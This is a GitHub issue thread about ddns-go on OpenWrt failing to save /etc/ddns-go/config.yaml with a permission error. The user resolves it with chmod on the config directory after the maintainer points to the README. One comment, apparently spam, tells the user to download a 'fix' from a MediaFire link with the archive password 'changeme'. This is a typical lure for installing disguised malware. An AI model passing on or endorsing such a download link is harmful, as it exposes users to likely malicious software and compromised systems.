### ISSUE TITLE
在openwrt使用提示“open /etc/ddns-go/config.yaml: permission denied”

### ISSUE THREAD

**Issue by hahaVVV402** [jeessy2/ddns-go#1231]
### Description

完成配置填写点保存提示“open /etc/ddns-go/config.yaml: permission denied”
![QQ_1724744106831](https://github.com/user-attachments/assets/a666f27f-3bc5-4570-b5fa-3eb17372b2f1)

### DNS Provider

阿里云

### Did you search for similar issues before submitting this one?

Yes, I did, but I didn't find anything useful

### Operating System

Linux

### Architecture

x86_64

### Version

v6.6.8

### How are you running ddns-go?

Service

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jeessy2** [comment]
参考首页指定文件地址

**Comment by hahaVVV402** [comment]
![QQ_1724745891379](https://github.com/user-attachments/assets/bff39340-6e72-4df3-9341-f0029ad0a6a4)
在etc/ddns-go 已经存在config.yaml 文件还需要重新指定一次吗

**Comment by hahaVVV402** [comment]
通过 chmod 755 /etc/ddns-go 解决了 感谢作者的耐心回复
